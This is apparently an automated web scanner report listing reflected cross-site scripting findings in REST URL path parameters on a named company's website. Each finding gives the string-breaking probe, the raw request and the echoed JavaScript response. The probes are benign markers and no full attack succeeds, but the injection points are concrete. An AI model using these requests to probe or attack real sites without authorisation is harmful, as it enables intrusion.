1.80. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec00a"%3b0a9aa0a024a was submitted in the REST URL parameter 1. This input was echoed as ec00a";0a9aa0a024a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsec00a"%3b0a9aa0a024a/it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsec00a";0a9aa0a024a/it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT F
...[SNIP]...

1.81. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd572'%3b321cd0f3a7a was submitted in the REST URL parameter 2. This input was echoed as bd572';321cd0f3a7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itbd572'%3b321cd0f3a7a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/itbd572';321cd0f3a7a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.82. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a90d3"%3bf4d3c13c800 was submitted in the REST URL parameter 2. This input was echoed as a90d3";f4d3c13c800 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/ita90d3"%3bf4d3c13c800/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Content-Type: text/html
Content-Length: 42289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/ita90d3";f4d3c13c800/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.83. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3607'%3bc6e6fefe83 was submitted in the REST URL parameter 1. This input was echoed as c3607';c6e6fefe83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc3607'%3bc6e6fefe83/it/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsc3607';c6e6fefe83/it/cloud-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.84. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dfaa"%3b0c1a3f022e7 was submitted in the REST URL parameter 1. This input was echoed as 5dfaa";0c1a3f022e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5dfaa"%3b0c1a3f022e7/it/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Date: Wed, 17 Nov 2010 00:40:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products5dfaa";0c1a3f022e7/it/cloud-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.85. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 767e9"%3bd598a6842f was submitted in the REST URL parameter 2. This input was echoed as 767e9";d598a6842f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it767e9"%3bd598a6842f/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42303
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it767e9";d598a6842f/cloud-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.86. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54488'%3b5961a620681 was submitted in the REST URL parameter 2. This input was echoed as 54488';5961a620681 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it54488'%3b5961a620681/cloud-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42305
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it54488';5961a620681/cloud-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.87. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81829'%3b8859f1e65d7 was submitted in the REST URL parameter 3. This input was echoed as 81829';8859f1e65d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it81829'%3b8859f1e65d7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43031
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it81829';8859f1e65d7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.88. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39773"%3b09cb144275f was submitted in the REST URL parameter 3. This input was echoed as 39773";09cb144275f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it39773"%3b09cb144275f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43033
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it39773";09cb144275f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.89. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c2c1'%3bcc59ecc5030 was submitted in the REST URL parameter 1. This input was echoed as 5c2c1';cc59ecc5030 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5c2c1'%3bcc59ecc5030/it/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products5c2c1';cc59ecc5030/it/cloud-it/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.90. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f62"%3b3ddf873d3a was submitted in the REST URL parameter 1. This input was echoed as 13f62";3ddf873d3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products13f62"%3b3ddf873d3a/it/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Date: Wed, 17 Nov 2010 00:40:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products13f62";3ddf873d3a/it/cloud-it/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.91. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87a36"%3bebedaa16cf9 was submitted in the REST URL parameter 2. This input was echoed as 87a36";ebedaa16cf9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it87a36"%3bebedaa16cf9/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42315
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it87a36";ebedaa16cf9/cloud-it/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.92. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31c'%3b407bf66b4dc was submitted in the REST URL parameter 2. This input was echoed as 9f31c';407bf66b4dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it9f31c'%3b407bf66b4dc/cloud-it/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:51 GMT

